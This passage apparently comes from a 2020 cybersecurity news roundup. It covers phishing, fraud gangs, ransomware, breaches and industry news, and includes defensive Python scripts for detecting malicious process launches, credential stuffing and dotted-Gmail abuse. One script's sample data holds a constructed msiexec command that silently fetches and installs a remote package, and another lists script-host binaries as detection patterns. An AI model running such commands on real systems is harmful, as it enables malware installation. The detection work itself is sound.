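    image: str          # full path of the new process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


URL_RE = re.compile(r"https?://", re.IGNORECASE)
# msiexec silent/unattended switches: /q, /qn, /qb, /quiet, /passive
QUIET_RE = re.compile(r"(?:^|\s)/(?:q[nb]?|quiet|passive)(?:\s|$)", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(?:appdata|programdata|temp|users\\public)\\", re.IGNORECASE)
VBOX_DEFAULT_DIR = "\\program files\\oracle\\virtualbox\\"   # assumed legitimate install path
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# child processes an Office document has no business starting (assumption for this example)
SCRIPT_HOSTS = {"msiexec.exe", "powershell.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def rule_remote_silent_msi(ev: ProcEvent):
    """msiexec installing, without UI, a package it downloads from a remote web server."""
    if basename(ev.image) != "msiexec.exe":
        return None
    if URL_RE.search(ev.cmdline) and QUIET_RE.search(ev.cmdline):
        return "msiexec silently installing a package fetched from a remote URL"
    return None


def rule_hypervisor_outside_install_dir(ev: ProcEvent):
    """A VirtualBox binary (VBox*.exe / VirtualBox.exe) running from an unexpected location."""
    name = basename(ev.image)
    if not (name.startswith("vbox") or name == "virtualbox.exe"):
        return None
    if VBOX_DEFAULT_DIR not in ev.image.lower():
        return "VirtualBox binary running outside its normal install directory"
    return None


def rule_office_spawn(ev: ProcEvent):
    """Office application spawning a script host or a binary in a user-writable directory."""
    parent = basename(ev.parent_image)
    if parent not in OFFICE_APPS:
        return None
    child = basename(ev.image)
    if child in SCRIPT_HOSTS:
        return f"{parent} spawned {child}"
    if USER_WRITABLE_RE.search(ev.image):
        return f"{parent} launched an executable from a user-writable directory"
    return None


RULES = [rule_remote_silent_msi, rule_hypervisor_outside_install_dir, rule_office_spawn]


def detect(events):
    """Return (event index, rule name, message) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            msg = rule(ev)
            if msg:
                hits.append((i, rule.__name__, msg))
    return hits


# Constructed sample telemetry; hosts, paths and names are placeholders.
SAMPLE_EVENTS = [
    # 0: scheduled task (as pushed by a GPO) runs msiexec to fetch and silently install a package
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i http://package-host.example.invalid/setup.msi /q",
              r"C:\Windows\System32\svchost.exe"),
    # 1: benign local silent install by a software deployment agent; must not fire
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Windows\ccmcache\agent.msi /qn",
              r"C:\Windows\CCM\CcmExec.exe"),
    # 2: headless VirtualBox started from the directory the crafted MSI unpacked into
    ProcEvent(r"C:\ProgramData\vmapp\VBoxHeadless.exe",
              r"VBoxHeadless.exe --startvm micro",
              r"C:\Windows\System32\msiexec.exe"),
    # 3: Excel (macro) launching a dropped binary from the user's AppData
    ProcEvent(r"C:\Users\jdoe\AppData\Roaming\dropped.exe",
              r"dropped.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    # 4: Excel launching the normal print spooler helper; must not fire
    ProcEvent(r"C:\Windows\splwow64.exe", r"splwow64.exe 12288",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
]

if __name__ == "__main__":
    for idx, rule_name, msg in detect(SAMPLE_EVENTS):
        print(f"event {idx}: [{rule_name}] {msg}")
```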

In the UK, these kinds of emails should be reported to the National Cyber Security Centre’s Suspicious Email Reporting Service, but this first requires employees to have the presence of mind to do so.

“The advice for organizations and employees is to remain vigilant to this new kind of threat, and to deploy training as regularly as possible to make sure individuals remain aware,” advised DomainTools malware researcher, Tarik Saleh. “Phishing is at its core an attack on people, and people remain the best defense against it, in addition to ensuring proper processes remain in place.”

Michigan Launches Cybercrime Hotline

Michigan victims of cybercrime now have a dedicated phone line to call for free round-the-clock support and advice. 

The Cybercrime Victim Support Initiative is available free of charge to residents in 13 northern Michigan counties, including Antrim, Benzie, Grand Traverse, Kalkaska, and Leelanau. 

Residents who have been targeted by cyber-criminals can call or text 211 from any phone to report the crime and receive tips on how to recover their personal information and funds. 

Calls will be handled by a center in Grand Rapids staffed by trained advisors from United Way, an organization that brings donors, volunteers, and community organizations together to solve critical problems.

In addition to offering practical guidance on what to do after a crime has taken place, the advisors will offer tips on how to avoid being caught in the cyber-criminal's net.

Data collected by the advisors will be stored in a central database and used to warn Michigan residents of all the latest scams doing the rounds. 

Seth Johnson, president of the United Way of Northwest Michigan, said that while most people are aware of old scams like the phishing email that appears to be sent by a Nigerian prince, some of the newer nefarious schemes, including ruses to con Americans out of their COVID-19 stimulus checks, are not common knowledge. 

"More and more of us are online and so more and more of us are vulnerable," Johnson said. 

As cybercrime grows ever more sophisticated, the hotline has been established as a place to which residents can turn for clear and reliable guidance. 

Johnson said: "This is meant to be a 24/7 resource where they can get the information they need." 

The initiative was launched by the Cybercrime Support Network and Heart of West Michigan United Way in partnership with the Heart of Florida United Way. Funding for the hotline was provided via a Department of Justice Office for Victims of Crime Vision 21 Grant. 

Leelanau County Sheriff Mike Borkovich said the hotline is a valuable resource for victims of cybercrime. 

Borkovich, who has seen an increase in the number of reported cybercrime incidents since the outbreak of COVID-19, said: "People have no scruples when it comes to things like that. They'll take advantage of senior citizens and try to rip them off."

Boston Cybersecurity Firm to Create 65 Jobs in Belfast

Boston cybersecurity firm Cygilant has announced plans to create 65 jobs at its new European security operations center (SOC) in Northern Ireland's capital city, Belfast. 

Cygilant, which employs 80 people globally, established the SOC in February 2020 with the support of Invest NI, the economic development agency for Northern Ireland. 

Already, 25 employees have been recruited to work at the new center, which is based in the Centrepoint Building next to the BBC on Ormeau Avenue. Now the company has pledged to create a further 40 jobs at the center over the next couple of years, with wages averaging around £43,000.

While lockdown measures introduced to slow the spread of COVID-19 in Northern Ireland remain in place, the SOC is being operated on a remote basis. 

But despite the difficulties created by the outbreak of the novel coronavirus, Cygilant's chief executive Rob Scott said that around ten new staff had been recruited for the center since lockdown measures were imposed. 

Invest NI has offered Cygilant a generous £455,000 in funding toward the creation of new jobs in Northern Ireland. 

Former Formula 1 race-car driver Scott said the investment played a key part in the company's decision to site their European operations in the Emerald Isle. 

The Mancunian and lifelong Manchester United Football Club fan explained: “Opening this SOC is our first foray into the European market and thanks to the support of Invest NI, we made the decision to invest here in Belfast.”

Scott also cited Belfast's local talent as a determining factor. He said: “There are between 18 and 20 cybersecurity companies, so it’s becoming a major hub for that technology. It’s because there’s already a pool of people and on top of that, there are the universities, which have great cyber-security programs.”

Economy Minister Diane Dodds said that the 65 jobs created by the US company will eventually contribute £2.8m in annual salaries.

“In these challenging times it is welcome news to be able to announce new cybersecurity jobs for Northern Ireland," Dodds told The Irish News.

“This is an important endorsement of Northern Ireland’s growing reputation for excellence in cybersecurity.”

Stanford University Tops List of US Cybersecurity Degree Providers

The cybersecurity degree offered by Stanford University has been ranked the best in the United States by independent educational organization Cyber Degrees Edu.

Private California university Stanford topped a list of America's 55 best cybersecurity degree providers published by Cyber Degrees Edu on May 18. In second and third place respectively were Carnegie Mellon University in Pennsylvania and the University of California, Davis.

Of the three top degree providers, Stanford has the lowest student-to-faculty ratio with 5 students to every 1 faculty member. At Carnegie Mellon, the ratio doubles to 10 to 1, while at the University of California, Davis, the ratio is an even higher 20 to 1. 

A proprietary ratings system was used to rank the various colleges and universities offering cybersecurity bachelor’s and master’s degree programs. 

The criteria used to determine the rankings included the school’s rates of acceptance and graduation. Researchers also compared educational establishments by their retention rate, which is the number of first-time students who return to the university the following year.

Stanford boasts the highest graduation rate, with 94% of students leaving the university with a degree. At Carnegie Mellon the rate is slightly lower at 89%, while at the University of California, Davis, 86% of students graduate. 

Researchers also looked at the costs of studying, the grants and scholarships available, and which colleges specialized in cybersecurity with a variety of degree programs.

"All schools on the list are either high quality or very affordable and are located across the country," said a spokesperson for Cyber Degrees Edu. "While the list provides some of the best schools for cybersecurity, Cyber Degrees EDU also recognizes that it is important for students to find the best school for their particular needs and so these rankings aim to provide the information needed for students to make the best possible choice for them."

When weighing up which degree provider was best, researchers looked beyond the school's overall reputation to its alumni.

Cyber Degrees Edu said: "What matters most is the reputation of the individual cybersecurity program. That is why knowing which schools were attended by the best cybersecurity professionals is so vital."

NHS Contact Tracing App Security Issues Detailed

New security issues have been discovered in the UK Government’s NHS contact tracing app, as well as a potential data breach.

The app is currently being trialed on the Isle of Wight and privacy issues have been raised, which the National Cyber Security Centre (NCSC) told BBC News it was already aware of and is in the process of addressing. Raised by researchers Dr Chris Culnane and Vanessa Teague, the main issues include:

  • In the presence of an untrusted TLS server, the registration process does not properly guarantee either the integrity of the authority public key or the privacy of the shared secrets established at registration. The result completely undermines core security goals of the protocol, including its privacy and its resistance to spoofing and manipulation
  • In the presence of an untrusted TLS server, the storing and transmitting of unencrypted interaction logs facilitates the recovery of InstallationIDs without requiring access to the Authority Private Key
  • Long lived BroadcastValues undermine BLE specified privacy protections and could reveal additional lifestyle attributes about a user who submits their data
  • The monitoring of interactions at eight second intervals could create unique interaction signatures that could be used to pairwise match device interactions, and when combined with unencrypted submission, allow the recovery of InstallationID from BroadcastValue without access to the Authority Private Key
  • The use of a deterministic counter to trigger KeepAlive updates risks creating an identifier that could be used to link BroadcastValues over multiple days

The researchers praised the “cryptographic protocol of the UK’s app [that] includes a much better effort at mitigation of most external attacks” and said there are admirable aspects of the implementation and the open availability of the source code.

“However, the messaging around the app, and in particular suggestions of broadening the data collected, combined with insufficient legislative protections, a lack of siloing of the data and no sunsetting of the data retention or usage, risk undermining the trust that has been earned,” they added.

The risks varied in severity, Culnane told BBC News, explaining that, in terms of the registration issues, “it's fairly low risk because it would require an attack against a well protected server, which we don't think is particularly likely.” However, he did warn that the risk surrounding the unencrypted data is higher, “because if someone was to get access to your phone, then they might be able to learn some additional information because of what is stored on that.”

David Grout, CTO for EMEA at FireEye, said: “The mounting security concerns and doubts attached to the trialed NHS app are stemming from registration issues and the use of unencrypted data within the app which can be exploited by cyber-criminals. One of the biggest concerns is attached to the fact it’s based on a ‘centralized’ model.

“Just yesterday, France defended its own centralized model where contact-matching happens via a computer service, as opposed to the decentralized model which uses the people’s phone to make the match. The UK Government will need to address these safeguarding issues ahead of the full nation roll-out, so citizens are fully confident that their data is not compromised but stored securely.”

The research came as Serco apologized after an employee accidentally shared the email addresses of almost 300 contact tracers when they were cc’d (rather than bcc’d) in an email to inform new trainees about training details.

Also, a group of civil society organizations, privacy advocates and academic researchers have written an open letter to Health Secretary Matt Hancock, asking questions about the contact tracing data store.

Signed by the likes of the Open Rights Group, Big Brother Watch, Privacy International and Liberty, they urged Hancock to “provide the public with more information and take appropriate measures to reduce the risk of data sharing and keep the aggregated data under democratic control.”

Online Retailers Brace for #COVID19 Fraud Surge

Most UK retailers are expecting a surge in online fraud due to the current COVID-19 pandemic, with many customers having already experienced account takeover (ATO) attacks, according to Riskified.

The fraud-screening firm polled 1000 consumers and over 120 e-commerce professionals to better understand their challenges during the current crisis.

It found that a fifth (20%) of customers have suffered an account takeover attack over the past year. This is often done via phishing or credential stuffing, where reused logins are tried over numerous accounts and sites simultaneously by fraudsters.

Once inside, they could steal personal information and card details stored in the account, use it to fraudulently pay for goods, or sell access to the account on the dark web.

Despite the significant numbers of customers already affected, and the fact that 52% of retailers think fraud will increase during the pandemic, over a quarter (26%) admitted to having no measures in place to tackle ATO.

This is a concern, not just because of the extra fraud losses it could incur but also in terms of the long-term customer relationships. More than half (51%) of respondents said they’d stop shopping with a retailer if they suffered ATO and a similar number claimed they’d delete their account. Over a third (37%) would go to a competitor.

Part of the problem is that detecting ATO is difficult because the attacker effectively looks like a legitimate customer. This might account for the fact that just 4% of consumers that suffered ATO learned their accounts were compromised from the retailer.

Riskified warned that mandating two-factor authentication or long-and-strong passwords for improved account security would cause extra friction that may put shoppers off.

Instead, retailers need systems that can check for things like device and network details, proxy usage and previous logins as well as subsequent purchasing behavior, it said.

UK e-commerce fraud losses on cards are said to have topped £359 million last year, but fraud often rises during recessions.
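The checks the article lists (device and network details, proxy usage, previous logins) can be applied to a login stream on the defender's side. The following is an added example written for this page, not Riskified's product logic: it flags source IPs whose traffic has the shape of a credential-stuffing run (many distinct accounts, mostly failures, in a short window) and then scores each successful login against the account's known device and network history. The event fields, the proxy list, the thresholds and the sample events are all constructed assumptions.

```python
"""Score login events for credential stuffing and account-takeover (ATO) signals.

Added example, not Riskified's product logic: it applies the checks the article
lists (device and network details, proxy usage, previous logins) to a constructed
batch of login events. Field names, the proxy list and the thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class LoginEvent:
    ts: int          # seconds since epoch (constructed values below are small integers)
    user: str
    ip: str
    device: str      # e.g. a device fingerprint or cookie id
    success: bool


# Constructed: IPs known to belong to anonymising proxies / hosting ranges.
KNOWN_PROXY_IPS = {"203.0.113.9"}


def stuffing_sources(events, window=300, min_users=5, max_success_ratio=0.3):
    """Return the set of source IPs that tried many distinct accounts in a short window
    with mostly failed logins, which is the shape of a credential-stuffing run."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e.ip].append(e)
    flagged = set()
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # slide the window so that evs[start:end+1] spans at most `window` seconds
            while evs[end].ts - evs[start].ts > window:
                start += 1
            chunk = evs[start:end + 1]
            users = {e.user for e in chunk}
            if len(users) >= min_users:
                ratio = sum(e.success for e in chunk) / len(chunk)
                if ratio <= max_success_ratio:
                    flagged.add(ip)
                    break
    return flagged


def ato_candidates(events, history):
    """Score each successful login against the account's prior (device, ip) history.

    `history` maps user -> set of (device, ip) pairs seen on earlier successful logins.
    Returns {(user, ts): score}; higher scores deserve step-up verification or review.
    """
    sources = stuffing_sources(events)
    scores = {}
    for e in sorted(events, key=lambda e: e.ts):
        if not e.success:
            continue
        known = history.get(e.user, set())
        score = 0
        if e.device not in {d for d, _ in known}:
            score += 2   # never-seen device for this account
        if e.ip not in {i for _, i in known}:
            score += 1   # never-seen network
        if e.ip in KNOWN_PROXY_IPS:
            score += 2   # anonymising proxy
        if e.ip in sources:
            score += 3   # same source is spraying other accounts
        if score:
            scores[(e.user, e.ts)] = score
    return scores


# Constructed sample: one IP spraying six accounts in 40 seconds and landing one hit,
# plus a genuine login from a user's usual device and a new-device login via a proxy.
SAMPLE_EVENTS = [
    LoginEvent(100, "alice", "198.51.100.7", "dev-spray", False),
    LoginEvent(105, "bob", "198.51.100.7", "dev-spray", False),
    LoginEvent(110, "carol", "198.51.100.7", "dev-spray", False),
    LoginEvent(115, "dave", "198.51.100.7", "dev-spray", False),
    LoginEvent(120, "erin", "198.51.100.7", "dev-spray", True),
    LoginEvent(140, "frank", "198.51.100.7", "dev-spray", False),
    LoginEvent(200, "alice", "192.0.2.44", "dev-alice-phone", True),
    LoginEvent(260, "bob", "203.0.113.9", "dev-unknown", True),
]

SAMPLE_HISTORY = {
    "alice": {("dev-alice-phone", "192.0.2.44")},
    "bob": {("dev-bob-laptop", "192.0.2.80")},
}

if __name__ == "__main__":
    print("stuffing sources:", stuffing_sources(SAMPLE_EVENTS))
    for key, score in ato_candidates(SAMPLE_EVENTS, SAMPLE_HISTORY).items():
        print(key, "->", score)
```

The scoring is deliberately additive and low-friction: alice's login from her usual phone and network scores zero and passes silently, while erin's "success" from the spraying IP and bob's login from an unknown device behind a proxy both score high enough to justify a step-up check, which is the compromise the article describes between blanket two-factor prompts and doing nothing.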

African Fraud Gang Files for Millions in #COVID19 Payments

A notorious West African BEC gang may have made millions defrauding the US government out of COVID-19 business compensation payments, according to Agari.

The security company said it had been tracking the Scattered Canary group for over a year and has now briefed the Secret Service of its findings.

The group — which has been involved in BEC, social security fraud and student aid fraud schemes in the past — has targeted at least eight states so far: Hawaii, Florida, Massachusetts, North Carolina, Oklahoma, Rhode Island, Washington, and Wyoming.

In Washington state, it has filed at least 174 fraudulent claims for unemployment benefit since April 29. Agari calculated that these claims were eligible to receive up to $790 a week for a total of $20,540 over a maximum of 26 weeks. Plus, the CARES Act includes $600 in Federal Pandemic Unemployment Compensation each week up to July 31.

This amounts to a potential windfall for the cybercrime gang of $4.9 million in this one state alone, assuming all claims are approved.

Between April 15 and April 29, Scattered Canary filed at least 82 fraudulent claims for CARES Act Economic Impact Payments, 30 of which were accepted by the IRS, explained Agari founder Patrick Peterson.

The scammers are using a tactic first revealed by Agari last year to scale their operations. Namely, they take advantage of a little-known feature in Gmail which means that a single user controls all “dotted versions” of their email address.

Thus, they can register multiple addresses for separate claims payments which are effectively the same address with dots in different places. They will then all redirect to a single inbox.

“As a result of our analysis, we have identified 259 different variations of a single email address used by Scattered Canary to create accounts on state and federal websites to carry out these fraudulent activities,” explained Peterson.
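The countermeasure to the dotted-address trick is to canonicalise addresses before checking for duplicate registrations. The block below is an added example written for this page, not Agari's tooling: it collapses Gmail variants (dots ignored in the local part, a `+tag` suffix ignored, googlemail.com treated as gmail.com, all of which Google documents) to one canonical form and counts how many distinct raw addresses map to the same inbox. The claim records are constructed; the `+tag` rule goes slightly beyond the dots the article mentions.

```python
"""Canonicalise e-mail addresses so that "dotted" Gmail variants collapse to one
identity, then count how many registrations map to the same inbox.

Added example (not Agari's tooling): the addresses and registration records
below are constructed; the canonicalisation rules for Gmail are the documented
ones (dots in the local part are ignored, '+tag' suffixes are delivered to the
same inbox, googlemail.com is an alias of gmail.com).
"""
from collections import defaultdict

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_email(address: str) -> str:
    """Return a canonical form of an e-mail address.

    For every domain: trim whitespace and lower-case (domains are case-insensitive,
    and treating local parts as case-insensitive is the safe choice for de-duplication).
    For Gmail only: drop dots and any '+tag' suffix from the local part and map
    googlemail.com to gmail.com, because all those variants deliver to one inbox.
    """
    address = address.strip().lower()
    if address.count("@") != 1:
        raise ValueError(f"not a single-@ address: {address!r}")
    local, domain = address.split("@")
    if domain in GMAIL_DOMAINS:
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def group_registrations(records):
    """Map canonical address -> list of (claim_id, raw_address) that share an inbox."""
    groups = defaultdict(list)
    for claim_id, raw in records:
        groups[canonical_email(raw)].append((claim_id, raw))
    return dict(groups)


def suspicious_inboxes(records, threshold=2):
    """Return {canonical: variant_count} for inboxes reached through at least
    `threshold` distinct raw addresses, i.e. likely multi-registration abuse."""
    out = {}
    for canon, entries in group_registrations(records).items():
        distinct = {raw for _, raw in entries}
        if len(distinct) >= threshold:
            out[canon] = len(distinct)
    return out


# Constructed sample: five claims, four of which are dotted/plus/case variants of one Gmail inbox.
SAMPLE_CLAIMS = [
    ("C-001", "john.doe@gmail.com"),
    ("C-002", "j.o.h.n.doe@gmail.com"),
    ("C-003", "johndoe+wa@googlemail.com"),
    ("C-004", "JohnDoe@gmail.com"),
    ("C-005", "john.doe@example.org"),  # dots are significant outside Gmail
]

if __name__ == "__main__":
    for canon, n in suspicious_inboxes(SAMPLE_CLAIMS).items():
        print(f"{canon}: {n} address variants")
```

Canonicalisation is applied only to the Gmail domains because for other providers dots in the local part are significant, so collapsing them everywhere would merge genuinely different mailboxes; the uniqueness check should be run on the canonical form at registration time, not only in after-the-fact analysis.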

The group is also taking advantage of Green Dot prepaid cards to cash out its fraudulently obtained government payments. These cards are able to receive direct payments and government benefits up to four days before they’re due to be officially paid, meaning they have obvious benefits for fraudsters.

“It shouldn’t be a surprise that scammers are trying to get a piece of the billions of dollars that has flooded the system to try and provide relief to millions of people who have been impacted by the pandemic,” concluded Peterson.

“Based on what we’ve seen from Scattered Canary’s 10-year history of scamming, they will continue to expand their portfolio of cybercrime to try and find new ways to con individuals, businesses, and governments out of as much money as they can.”

Ukrainian Police Arrest Suspected Combo List Mastermind

Ukrainian intelligence officers have arrested a man they believe to be Sanix, a notorious cyber-criminal responsible for selling billions of log-ins online.

In concert with cyber police, agents from the Secret Service of Ukraine (SBU) swooped on the individual, who lived in the Ivano-Frankivsk region.

They seized 2TB of stolen user information, mobile phones “with evidence of illegal activities” and cash from illegal transactions amounting to around 190,000 hryvnias ($7100) and more than $3000.

Officers also seized from the arrested man’s apartment PINs for bank cards, cryptocurrency wallets, PayPal account details, and “information about computers hacked for further use in botnets and for organizing DDoS attacks.”

Sanix is widely believed to have been responsible for selling the “Collection” combo lists of email usernames and passwords that first emerged in January 2019.

The first data dump, dubbed “Collection #1,” contained 772 million unique email addresses, the largest single trove to be fed into the HaveIBeenPwned breach notification site, and more than 21 million unique passwords.

It subsequently emerged that this collection contained data that was two or three years old, gathered from multiple sources. However, the person trying to sell them, dubbed “Sanixer” on Telegram, told Brian Krebs at the time that the other packages up for sale were more current.

Together, he claimed they amounted to around 4TB of data, or many billions of records.

Such lists are typically bought and used in credential stuffing attacks, where they’re fed into an automated program and tried simultaneously on multiple sites and accounts in a bid to crack them open.

The reason cyber-criminals have success with this tactic is that computer users continue to reuse their passwords across multiple services.

The SBU said it found evidence of Collection #1 on Sanix’s machine along with “at least seven similar databases” of stolen and cracked/decrypted passwords.

REvil to Auction Stolen Madonna Data

A threat group that claims to have stolen nearly a terabyte of data from a prominent entertainment law firm has said it will put sensitive information relating to Madonna up for auction.

REvil allegedly made off with 756GB of data from New York lawyers Grubman Shire Meiselas & Sack in a ransomware attack earlier this month. The law firm, whose celebrity client list includes LeBron James and Mariah Carey, confirmed last week that it had fallen victim to a ransomware attack. 

After their initial ransom demand for $21m in Bitcoin was not met, REvil doubled it and released 2GB of data that appeared to be taken from contracts involving Lady Gaga. But so far, the law firm has not paid the criminals a dime.

In a statement to Page Six, Grubman Shire Meiselas & Sack said: “We have been informed by the experts and the FBI that negotiating with or paying ransom to terrorists is a violation of federal criminal law.”

However, paying to retrieve the encrypted files may not have been ruled out entirely by the law firm, which told Bleeping Computer: “Unless the FBI determines the ransomware was deployed by a designated terrorist organization or nation state, the FBI treats ransomware investigations as criminal matters.”

Now the threat group, intent on monetizing their crime, has said it will auction off stolen data relating to the singer Madonna on May 25. Bidding is set to start at $1m. 

The criminals claim that the auction will take place confidentially and that they will delete their copy of the data after the sale has been completed. 

Earlier this week, REvil claimed to have data about Donald Trump for sale. The group said that the data was not stolen from Grubman Shire Meiselas & Sack but was "accumulated over the entire time of our activity."

Without producing any evidence to back up its claim, REvil is now conveniently saying that the data on Trump has been sold. On its Tor site, the group stated: "Interested people contacted us and agreed to buy all the data about the US president." 

Commenting on the alleged sale of the Trump data, Emsisoft's Brett Callow said: "Whether they had the presidency-destroying information that they claimed to have is something we may never know. But I still think it was probably a bluff!"

Minnesota Sees Surge in Sex Crimes Against Minors Online

Minnesota law enforcement agencies have reported a surge in reports of sexual crimes against children online since lockdown measures were introduced to impede the spread of the novel coronavirus. 

Authorities believe the jump in crime is linked to both children and predators spending more time online as schools and businesses remain closed.

The Minnesota Bureau of Criminal Apprehension recorded more than 1,000 complaints involving child pornography or other forms of cyber exploitation of minors in March and April 2020. The disturbing statistic represents a 30% increase in complaints received over the same period last year. 

Drew Evans, superintendent of the Bureau of Criminal Apprehension that operates the Internet Crimes Against Children investigative unit, said it was "very unusual to see such a large jump" year on year.

Sadly, the spike in reports of online child exploitation while the United States is under lockdown isn't unique to Minnesota. The National Center for Missing and Exploited Children recorded more than 6 million tips concerning online child exploitation in March and April 2020. This figure is three times higher than the number recorded over the same time period in 2019.

“That’s probably the largest number of reports in a two-month period that we’ve ever received,” said John Shehan, vice president of the center’s Exploited Children Division. 

According to Shehan, child predators have openly stated on the dark web that they are taking advantage of stay-at-home orders to indulge their illegal predilections. 

Shehan said that the majority of tips received by the center are reports of child pornography, but many concern sextortion incidents in which children are enticed into sharing lewd photos online, usually on social media.

Under social distancing restrictions, Minnesota has suspended the use of grand juries since March 23. Without them, federal prosecutors are struggling to indict crimes involving the sexual exploitation of children online. 

“We’re not indicting cases, but they’re still coming in and we’re still working them,” said Minnesota US Attorney Erica MacDonald. 

She said her office was working with county prosecutors and law enforcement to ensure “we don’t leave people in the community who are posing an imminent threat” to minors.

MacDonald anticipates a boom in indictments once the temporary suspension is lifted.

New Program Trains Dallas Veterans for Cybersecurity Careers

A new program to train veterans and their families for careers in cybersecurity was announced today by NPower and AT&T.

NPower is a national nonprofit organization that specializes in delivering cutting-edge information technology training to veterans and their families from underserved communities. The new training program, which starts in late June, will support veterans living in Dallas, Texas, as they embark on a second career in the cybersecurity field.  

AT&T has worked with NPower to augment the curriculum of the new program. The telecommunications company has also supported the program with a cash injection of $200,000. 

AT&T’s contribution to NPower will support 25 veterans and military spouses as they learn the skills necessary to succeed in a new cybersecurity role.  

According to the US Department of Labor (DOL), while some industries are struggling with the effects of lockdown measures introduced to slow the spread of COVID-19, the employment prospects for information security analysts are bright. 

The DOL states that employment of information security analysts is projected to grow 32% from 2018 to 2028, much faster than the average for all occupations.

“As more people use digital communications to stay connected during the COVID-19 crisis, our country needs more cybersecurity professionals who are ready to help lead the fight against cybercrime,” said Roger Thornton, VP, Products and Technology, AT&T Cybersecurity. 

Thornton said that the training veterans receive from the military gives them transferable skills for a new career in digital defense.

“Military veterans are perfect candidates for these positions because they already have many of the technical skills required for a career in information technology," said Thornton. 

"At AT&T, we are proud to employ a large number of military veterans, and we are pleased to be working with NPower to prepare even more veterans for a rewarding career that will allow them to help protect our critical digital infrastructure.” 

NPower’s curriculum exposes students to security and cloud architecture and teaches them how to diagnose networks, manage operating systems, and utilize security tools to address vulnerabilities and threats. Students have an opportunity to earn both CompTIA Security+ and Linux+ certifications.

NTT Report Demonstrates Changing Approaches of Cyber-Criminals

There was a marked increase in the volume of cyber-attacks across all industries in 2019 compared with 2018, according to NTT’s 2020 Global Threat Intelligence Report (GTIR) published today. The study also revealed the extent to which cyber-criminals are innovating their methods, which is causing major challenges to all organizations.

According to the global technology service company, the most common methods used by malicious actors last year were remote code execution (15%) and injection (14%) attacks. Such attacks were found to be effective due to organizations’ poor practices related to network, operating system and application configuration, testing, security controls and overall security hygiene.

Additionally, the growing use of artificial intelligence (AI) and machine learning to automate attacks by cyber-criminals was highlighted, with 21% of malware detected found to be in the form of a vulnerability scanner.

NTT also said it had seen a re-emergence of Internet of Things (IoT) weaponization in 2019, with a resurgence of Mirai and derivatives underpinning these attacks.

In the wide-ranging report, it was revealed that technology was the sector most targeted by cyber-criminals last year, involved in 25% of all attacks compared with 17% in the previous year. More than half of attacks aimed at this industry were application-specific (31%) and DoS/DDoS (25%). This was followed by government, at 16% of all attacks, and finance at 15%.

Around 20% of attacks targeted content management systems such as WordPress, Joomla!, Drupal and noneCMS, which criminals see as a means of stealing data from businesses and launching further attacks.

Mark Thomas, global head of threat intelligence at NTT, commented: “The technology sector experienced a 70% increase in overall attack volume. Weaponization of IoT attacks also contributed to this rise and, while no single botnet dominated activity, we saw significant volumes of both Mirai and IoTroop activity. Attacks on government organizations nearly doubled, including big jumps in both reconnaissance activity and application-specific attacks, driven by threat actors taking advantage of the increase in online local and regional services delivered to citizens.”

The report also made some observations regarding the activities of cyber-criminals so far in 2020, particularly in light of the COVID-19 pandemic.

Matthew Gyde, president and CEO of the security division, NTT, said: “The current global crisis has shown us that cyber-criminals will always take advantage of any situation and organizations must be ready for anything. We are already seeing an increased number of ransomware attacks on healthcare organizations and we expect this to get worse before it gets better. Now more than ever, it’s critical to pay attention to the security that enables your business, making sure you are cyber-resilient and maximizing the effectiveness of secure-by-design initiatives.”

easyJet Says Details of Nine Million Customers Accessed in Data Breach

easyJet has revealed that the personal data of approximately nine million of its customers has been accessed following a “highly sophisticated” cyber-attack on its system. This includes credit card details of a small subset of these customers (2208), with the airline confirming it has already taken action to contact and offer support to those individuals.

For the rest of the customers affected, email addresses and travel details were accessed. easyJet said these customers will be contacted in the next few days and the company will “advise them of protective steps to minimize any risk of potential phishing.”

The company took immediate steps to manage the incident once it was aware of the attack and closed off the unauthorized access. It also stated that it has notified the National Cyber Security Centre and the Information Commissioner's Office (ICO) of the breach. The firm has not given any details on the nature of the breach.

There is currently no evidence that the information accessed has been misused; however, the airline is urging its customers to stay alert to any unsolicited communications and to be “cautious of any communications purporting to come from easyJet or easyJet Holidays.”

Johan Lundgren, easyJet chief executive officer, said: “We take the cybersecurity of our systems very seriously and have robust security measures in place to protect our customers’ personal information. However, this is an evolving threat as cyber-attackers get ever more sophisticated.

“Since we became aware of the incident, it has become clear that owing to COVID-19 there is heightened concern about personal data being used for online scams. As a result, and on the recommendation of the ICO, we are contacting those customers whose travel information was accessed and we are advising them to be extra vigilant, particularly if they receive unsolicited communications.”

The incident has come at a particularly bad time for easyJet, which faces the possibility of a large fine under General Data Protection Regulation (GDPR) rules.

Commenting on the breach, Felix Rosbach, product manager at data security specialists comforte AG, said: “The aviation industry is struggling at present given the current pandemic so seeing another major airline succumb to a data breach is not pleasant. On first glance, easyJet has followed the correct procedures and informed all affected customers who have had their sensitive data compromised. However, this situation could have been avoided.”

Last year, British Airways (BA) was hit by a record £183m GDPR fine (issued as a notice of intention to fine) after failing to prevent a digital skimming attack in 2018.

Trust in Data and Metrics Processes Cause Security Headaches for Financial Services

Security leaders are being challenged to create business metrics, but without having total trust in the data they work with.

According to research by Panaseer of over 400 security leaders in financial services organizations, 96% of companies use metrics to measure their cyber-posture, but 36% said their biggest challenge in creating metrics to measure and report on risk is trust in the data.

Other issues included the resources required to produce metrics (21%), the frequency of requests (14%) and confusion over knowing what metric to use (15%). Fewer than half of respondents (47%) could claim to be very confident that they are using the right security metrics to measure cyber-risk.

